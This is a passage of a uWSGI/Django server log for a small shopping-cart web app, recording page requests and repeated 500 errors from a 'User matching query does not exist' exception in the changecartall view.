[pid: 26024|app: 0|req: 17/17] 113.88.14.120 () {42 vars in 747 bytes} [Wed Mar 13 07:23:17 2019] GET /axf/cart/ => generated 942 bytes in 3 msecs (HTTP/1.1 200) 4 headers in 123 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 18/18] 113.88.14.120 () {42 vars in 749 bytes} [Wed Mar 13 07:23:18 2019] GET /axf/login/ => generated 1906 bytes in 4 msecs (HTTP/1.1 200) 5 headers in 278 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 19/19] 113.88.14.120 () {44 vars in 837 bytes} [Wed Mar 13 07:23:19 2019] GET /axf/mine/ => generated 4999 bytes in 5 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 20/20] 113.88.14.120 () {44 vars in 836 bytes} [Wed Mar 13 07:23:21 2019] GET /axf/cart/ => generated 942 bytes in 3 msecs (HTTP/1.1 200) 4 headers in 123 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 21/21] 113.88.14.120 () {44 vars in 820 bytes} [Wed Mar 13 07:24:03 2019] GET /axf/cart/ => generated 942 bytes in 4 msecs (HTTP/1.1 200) 4 headers in 123 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 22/22] 113.88.14.120 () {44 vars in 820 bytes} [Wed Mar 13 07:24:07 2019] GET /axf/cart/ => generated 942 bytes in 3 msecs (HTTP/1.1 200) 4 headers in 123 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 23/23] 113.87.160.176 () {40 vars in 664 bytes} [Wed Mar 13 07:24:31 2019] GET /axf => generated 0 bytes in 0 msecs (HTTP/1.1 301) 3 headers in 110 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 24/24] 113.88.14.120 () {42 vars in 654 bytes} [Wed Mar 13 07:24:31 2019] GET /axf => generated 0 bytes in 0 msecs (HTTP/1.1 301) 3 headers in 110 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 25/25] 113.88.14.120 () {42 vars in 656 bytes} [Wed Mar 13 07:24:31 2019] GET /axf/ => generated 22501 bytes in 2 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 26/26] 113.87.160.176 () {40 vars in 666 bytes} [Wed Mar 13 07:24:31 2019] GET /axf/ => generated 22501 bytes in 0 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
Not Found: /favicon.ico
[pid: 26024|app: 0|req: 27/27] 113.87.160.176 () {38 vars in 645 bytes} [Wed Mar 13 07:24:36 2019] GET /favicon.ico => generated 2064 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /favicon.ico
[pid: 26024|app: 0|req: 28/28] 113.88.14.120 () {42 vars in 617 bytes} [Wed Mar 13 07:24:42 2019] GET /favicon.ico => generated 2064 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 29/29] 113.87.160.176 () {42 vars in 756 bytes} [Wed Mar 13 07:24:45 2019] GET /axf/ => generated 22501 bytes in 1 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 30/30] 113.87.160.176 () {42 vars in 777 bytes} [Wed Mar 13 07:24:52 2019] GET /axf/mine/ => generated 4999 bytes in 5 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 31/31] 113.87.160.176 () {42 vars in 790 bytes} [Wed Mar 13 07:24:56 2019] GET /axf/register/ => generated 3525 bytes in 4 msecs (HTTP/1.1 200) 5 headers in 278 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 32/32] 113.87.160.176 () {44 vars in 857 bytes} [Wed Mar 13 07:25:17 2019] GET /axf/checkemail/?email=123%40qq.com => generated 55 bytes in 4 msecs (HTTP/1.1 200) 3 headers in 100 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 33/33] 113.87.160.176 () {44 vars in 863 bytes} [Wed Mar 13 07:25:23 2019] GET /axf/checkemail/?email=123123%40qq.com => generated 60 bytes in 3 msecs (HTTP/1.1 200) 3 headers in 100 bytes (1 switches on core 0)
4297f44b13955235245b2497399d7a93
[pid: 26024|app: 0|req: 34/34] 113.87.160.176 () {48 vars in 1000 bytes} [Wed Mar 13 07:25:42 2019] POST /axf/register/ => generated 0 bytes in 37 msecs (HTTP/1.1 302) 6 headers in 277 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 35/35] 113.87.160.176 () {44 vars in 919 bytes} [Wed Mar 13 07:25:42 2019] GET /axf/mine/ => generated 5080 bytes in 10 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 36/36] 113.87.160.176 () {44 vars in 914 bytes} [Wed Mar 13 07:26:20 2019] GET /axf/market/ => generated 10768 bytes in 17 msecs (HTTP/1.1 200) 4 headers in 125 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 37/37] 113.87.160.176 () {44 vars in 879 bytes} [Wed Mar 13 07:26:23 2019] GET /axf/addcart/?goodsid=984 => generated 73 bytes in 12 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 38/38] 113.87.160.176 () {44 vars in 930 bytes} [Wed Mar 13 07:26:24 2019] GET /axf/market/ => generated 291883 bytes in 70 msecs (HTTP/1.1 200) 4 headers in 126 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 39/39] 113.87.160.176 () {44 vars in 879 bytes} [Wed Mar 13 07:26:28 2019] GET /axf/addcart/?goodsid=562 => generated 73 bytes in 15 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 40/40] 113.87.160.176 () {44 vars in 879 bytes} [Wed Mar 13 07:26:30 2019] GET /axf/addcart/?goodsid=563 => generated 73 bytes in 12 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 41/41] 113.87.160.176 () {44 vars in 879 bytes} [Wed Mar 13 07:26:38 2019] GET /axf/addcart/?goodsid=561 => generated 73 bytes in 12 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 42/42] 113.87.160.176 () {44 vars in 879 bytes} [Wed Mar 13 07:26:38 2019] GET /axf/addcart/?goodsid=561 => generated 73 bytes in 25 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 43/43] 113.87.160.176 () {44 vars in 879 bytes} [Wed Mar 13 07:26:38 2019] GET /axf/addcart/?goodsid=561 => generated 73 bytes in 12 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 44/44] 113.87.160.176 () {44 vars in 879 bytes} [Wed Mar 13 07:26:39 2019] GET /axf/addcart/?goodsid=561 => generated 73 bytes in 12 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 45/45] 113.87.160.176 () {44 vars in 938 bytes} [Wed Mar 13 07:26:43 2019] GET /axf/market/0/2/ => generated 334540 bytes in 82 msecs (HTTP/1.1 200) 4 headers in 126 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 46/46] 113.87.160.176 () {44 vars in 921 bytes} [Wed Mar 13 07:26:48 2019] GET /axf/cart/ => generated 5822 bytes in 18 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 47/47] 113.87.160.176 () {44 vars in 891 bytes} [Wed Mar 13 07:26:54 2019] GET /axf/changecartselect/?cartid=10 => generated 91 bytes in 6 msecs (HTTP/1.1 200) 3 headers in 100 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 48/48] 113.87.160.176 () {44 vars in 891 bytes} [Wed Mar 13 07:27:10 2019] GET /axf/changecartselect/?cartid=11 => generated 91 bytes in 8 msecs (HTTP/1.1 200) 3 headers in 100 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 49/49] 113.87.160.176 () {44 vars in 889 bytes} [Wed Mar 13 07:27:13 2019] GET /axf/changecartselect/?cartid=9 => generated 91 bytes in 7 msecs (HTTP/1.1 200) 3 headers in 100 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 50/50] 113.87.160.176 () {44 vars in 889 bytes} [Wed Mar 13 07:27:15 2019] GET /axf/changecartselect/?cartid=8 => generated 91 bytes in 7 msecs (HTTP/1.1 200) 3 headers in 100 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 51/51] 113.87.160.176 () {44 vars in 889 bytes} [Wed Mar 13 07:27:18 2019] GET /axf/changecartall/?isall=false => generated 60 bytes in 23 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 52/52] 113.87.160.176 () {44 vars in 891 bytes} [Wed Mar 13 07:27:26 2019] GET /axf/changecartselect/?cartid=10 => generated 90 bytes in 7 msecs (HTTP/1.1 200) 3 headers in 100 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 53/53] 113.87.160.176 () {44 vars in 891 bytes} [Wed Mar 13 07:27:28 2019] GET /axf/changecartselect/?cartid=11 => generated 90 bytes in 8 msecs (HTTP/1.1 200) 3 headers in 100 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 54/54] 113.87.160.176 () {44 vars in 889 bytes} [Wed Mar 13 07:27:30 2019] GET /axf/changecartselect/?cartid=9 => generated 90 bytes in 6 msecs (HTTP/1.1 200) 3 headers in 100 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 55/55] 113.87.160.176 () {44 vars in 889 bytes} [Wed Mar 13 07:27:31 2019] GET /axf/changecartselect/?cartid=8 => generated 90 bytes in 7 msecs (HTTP/1.1 200) 3 headers in 100 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 56/56] 113.87.160.176 () {44 vars in 887 bytes} [Wed Mar 13 07:27:37 2019] GET /axf/changecartall/?isall=true => generated 60 bytes in 26 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 57/57] 113.87.160.176 () {44 vars in 889 bytes} [Wed Mar 13 07:27:40 2019] GET /axf/changecartall/?isall=false => generated 60 bytes in 26 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
Internal Server Error: /axf/changecartall/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 301, in changecartall
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26024|app: 0|req: 58/58] 113.87.160.176 () {44 vars in 887 bytes} [Wed Mar 13 07:27:45 2019] GET /axf/changecartall/?isall=true => generated 12554 bytes in 47 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 0)
Not Found: /
[pid: 26024|app: 0|req: 59/59] 113.87.160.176 () {40 vars in 652 bytes} [Wed Mar 13 07:27:51 2019] GET / => generated 2013 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /favicon.ico
[pid: 26024|app: 0|req: 60/60] 113.87.160.176 () {40 vars in 631 bytes} [Wed Mar 13 07:27:51 2019] GET /favicon.ico => generated 2064 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Internal Server Error: /axf/changecartall/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 301, in changecartall
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26024|app: 0|req: 61/61] 113.87.160.176 () {44 vars in 889 bytes} [Wed Mar 13 07:27:53 2019] GET /axf/changecartall/?isall=false => generated 12558 bytes in 19 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 0)
Internal Server Error: /axf/changecartall/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 301, in changecartall
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26024|app: 0|req: 62/62] 113.87.160.176 () {44 vars in 887 bytes} [Wed Mar 13 07:27:54 2019] GET /axf/changecartall/?isall=true => generated 12554 bytes in 19 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 63/63] 113.87.160.176 () {40 vars in 658 bytes} [Wed Mar 13 07:27:57 2019] GET /axf => generated 0 bytes in 0 msecs (HTTP/1.1 301) 3 headers in 110 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 64/64] 113.87.160.176 () {40 vars in 660 bytes} [Wed Mar 13 07:27:57 2019] GET /axf/ => generated 22501 bytes in 20 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 65/65] 113.87.160.176 () {44 vars in 891 bytes} [Wed Mar 13 07:27:58 2019] GET /axf/changecartselect/?cartid=11 => generated 90 bytes in 7 msecs (HTTP/1.1 200) 3 headers in 100 bytes (1 switches on core 0)
Internal Server Error: /axf/changecartall/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 301, in changecartall
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26024|app: 0|req: 66/66] 113.87.160.176 () {44 vars in 889 bytes} [Wed Mar 13 07:28:00 2019] GET /axf/changecartall/?isall=false => generated 12558 bytes in 21 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 0)
Internal Server Error: /axf/changecartall/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 301, in changecartall
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26024|app: 0|req: 67/67] 113.87.160.176 () {44 vars in 887 bytes} [Wed Mar 13 07:28:01 2019] GET /axf/changecartall/?isall=true => generated 12554 bytes in 20 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 0)
Internal Server Error: /axf/changecartall/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 301, in changecartall
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26024|app: 0|req: 68/68] 113.87.160.176 () {44 vars in 889 bytes} [Wed Mar 13 07:28:02 2019] GET /axf/changecartall/?isall=false => generated 12558 bytes in 18 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 0)
Internal Server Error: /axf/changecartall/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 301, in changecartall
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26024|app: 0|req: 69/69] 113.87.160.176 () {44 vars in 887 bytes} [Wed Mar 13 07:28:03 2019] GET /axf/changecartall/?isall=true => generated 12554 bytes in 20 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 70/70] 113.88.14.120 () {42 vars in 720 bytes} [Wed Mar 13 07:28:04 2019] GET /axf/ => generated 22501 bytes in 1 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
Internal Server Error: /axf/changecartall/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 301, in changecartall
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26024|app: 0|req: 71/71] 113.87.160.176 () {44 vars in 889 bytes} [Wed Mar 13 07:28:04 2019] GET /axf/changecartall/?isall=false => generated 12558 bytes in 19 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 0)
Internal Server Error: /axf/changecartall/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 301, in changecartall
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26024|app: 0|req: 72/72] 113.87.160.176 () {44 vars in 887 bytes} [Wed Mar 13 07:28:05 2019] GET /axf/changecartall/?isall=true => generated 12554 bytes in 20 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 0)
Internal Server Error: /axf/changecartall/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 301, in changecartall
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26024|app: 0|req: 73/73] 113.87.160.176 () {44 vars in 889 bytes} [Wed Mar 13 07:28:05 2019] GET /axf/changecartall/?isall=false => generated 12558 bytes in 20 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 74/74] 113.88.14.120 () {42 vars in 741 bytes} [Wed Mar 13 07:28:07 2019] GET /axf/mine/ => generated 4999 bytes in 5 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 75/75] 113.87.160.176 () {44 vars in 891 bytes} [Wed Mar 13 07:28:10 2019] GET /axf/changecartselect/?cartid=10 => generated 90 bytes in 8 msecs (HTTP/1.1 200) 3 headers in 100 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 76/76] 113.87.160.176 () {44 vars in 889 bytes} [Wed Mar 13 07:28:11 2019] GET /axf/changecartselect/?cartid=9 => generated 90 bytes in 10 msecs (HTTP/1.1 200) 3 headers in 100 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 77/77] 113.87.160.176 () {42 vars in 755 bytes} [Wed Mar 13 07:28:12 2019] GET /axf/register/ => generated 3525 bytes in 5 msecs (HTTP/1.1 200) 5 headers in 278 bytes (1 switches on core 0)
[pid: 26024|app: 0|req: 78/78] 113.87.160.176 () {44 vars in 889 bytes} [Wed Mar 13 07:28:14 2019] GET /axf/changecartselect/?cartid=8 => generated 90 bytes in 8 msecs (HTTP/1.1 200) 3 headers in 100 bytes (1 switches on core 0)
Internal Server Error: /axf/changecartall/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 301, in changecartall
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26024|app: 0|req: 79/79] 113.87.160.176 () {44 vars in 887 bytes} [Wed Mar 13 07:28:18 2019] GET /axf/changecartall/?isall=true => generated 12554 bytes in 20 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 0)
Internal Server Error: /axf/changecartall/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 301, in changecartall
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26024|app: 0|req: 80/80] 113.87.160.176 () {44 vars in 889 bytes} [Wed Mar 13 07:28:19 2019] GET /axf/changecartall/?isall=false => generated 12558 bytes in 21 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 0)
Internal Server Error: /axf/changecartall/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 301, in changecartall
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26024|app: 0|req: 81/81] 113.87.160.176 () {44 vars in 887 bytes} [Wed Mar 13 07:28:19 2019] GET /axf/changecartall/?isall=true => generated 12554 bytes in 20 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 0)
Internal Server Error: /axf/changecartall/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 301, in changecartall
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26024|app: 0|req: 82/82] 113.87.160.176 () {44 vars in 889 bytes} [Wed Mar 13 07:28:20 2019] GET /axf/changecartall/?isall=false => generated 12558 bytes in 20 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 0)
Internal Server Error: /axf/changecartall/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 301, in changecartall
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
